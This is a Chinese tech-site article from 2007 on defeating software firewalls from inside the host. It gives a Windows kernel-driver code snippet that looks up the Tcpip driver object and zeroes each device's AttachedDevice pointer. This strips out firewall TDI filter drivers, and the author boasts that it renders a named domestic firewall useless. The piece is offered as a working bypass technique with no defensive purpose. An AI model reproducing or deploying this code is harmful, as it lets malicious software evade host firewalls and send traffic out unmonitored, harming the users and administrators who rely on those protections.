网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 安全防护 > 防火墙 > 突破防火墙之KillFilter  

突破防火墙之KillFilter

2007-08-31  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

唉,软件防火墙好像没一个令我满意的,都比较弱,考虑不全。国内的防火墙更是令人心寒~ 无论是DLL注入还是不引入DLL的纯代码注入,还是TDI Cilent,都能把国内的防火墙搞定。NDIS hook 更不要说了..

来点好玩的,其实我们只要写个驱动,从设备栈里把防火墙的TDI过滤驱动给摘除掉,这样就能对付一般的防火墙了。当然,国外强一点的防火墙,比如ZoneAlarm Pro 6.5就得再结合其他方法了,嘿嘿。

摘除过滤驱动的代码片段:



RtlInitUnicodeString ( &TcpipName, L"\\Driver\\Tcpip" );

ObReferenceObjectByName( &TcpipName,
                      OBJ_CASE_INSENSITIVE,
                      NULL,
                      0,
                      *IoDriverObjectType,
                      KernelMode,                                           网管论坛bbs_bitsCN_com
                      NULL,
                      &TcpipDrvObj);

 CurrentDevice = TcpipDrvObj->DeviceObject;

 while(CurrentDevice != NULL )
 {
 CurrentDevice->AttachedDevice=0;
 CurrentDevice = CurrentDevice->NextDevice;
 }



这段代码就能足以使国内人人皆知的天网防火墙装了和没装一样... 呵呵

PS:这里的突破指的是软件防火墙的内对外层面。

TAGs
 上一篇:防火墙设计 定义所需要的防御能力   下一篇:网管教你清除掉服务器上的ICS防火墙
突破防火墙之KillFilter 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
最新推荐文章:
网管论坛交流: